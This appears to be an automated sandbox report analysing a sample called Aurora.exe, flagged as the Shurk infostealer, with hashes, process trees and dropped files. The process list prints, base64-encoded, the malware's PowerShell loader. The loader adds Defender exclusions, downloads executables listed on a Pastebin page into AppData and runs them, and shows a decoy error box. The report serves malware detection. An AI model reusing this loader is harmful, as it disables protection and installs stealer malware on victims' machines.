Analysis
-
max time kernel
151s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
01-05-2023 10:45
Behavioral task
behavioral1
Sample
Aurora.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Aurora.exe
Resource
win10v2004-20230220-en
General
-
Target
Aurora.exe
-
Size
25.5MB
-
MD5
5b5049eee909a12420356f785890ee12
-
SHA1
2458920623ab942e1f564cb09ae25fb02b6b76a0
-
SHA256
4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
-
SHA512
5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
-
SSDEEP
98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF
Malware Config
Extracted
https://pastebin.com/raw/tPAFrSUD
Signatures
-
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
-
Shurk Stealer payload 1 IoCs
resource yara_rule behavioral1/memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer -
Blocklisted process makes network request 7 IoCs
flow pid Process 4 1200 powershell.exe 6 1200 powershell.exe 7 1200 powershell.exe 8 1200 powershell.exe 9 1200 powershell.exe 10 1200 powershell.exe 11 1200 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2016 LXIX.exe -
Loads dropped DLL 1 IoCs
pid Process 2008 Aurora.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1200 powershell.exe 1200 powershell.exe 1636 powershell.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 1940 taskmgr.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2008 wrote to memory of 2016 2008 Aurora.exe 27 PID 2008 wrote to memory of 2016 2008 Aurora.exe 27 PID 2008 wrote to memory of 2016 2008 Aurora.exe 27 PID 2008 wrote to memory of 2016 2008 Aurora.exe 27 PID 2016 wrote to memory of 1200 2016 LXIX.exe 28 PID 2016 wrote to memory of 1200 2016 LXIX.exe 28 PID 2016 wrote to memory of 1200 2016 LXIX.exe 28 PID 2016 wrote to memory of 1200 2016 LXIX.exe 28 PID 1200 wrote to memory of 1636 1200 powershell.exe 30 PID 1200 wrote to memory of 1636 1200 powershell.exe 30 PID 1200 wrote to memory of 1636 1200 powershell.exe 30 PID 1200 wrote to memory of 1636 1200 powershell.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\LXIX.exe"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1940
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0UGIAZYGNZO0K1S7M2S.temp
Filesize7KB
MD5bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1995cb410201455bf8519498b33b0f661ae95a282
SHA256d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1995cb410201455bf8519498b33b0f661ae95a282
SHA256d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
Filesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e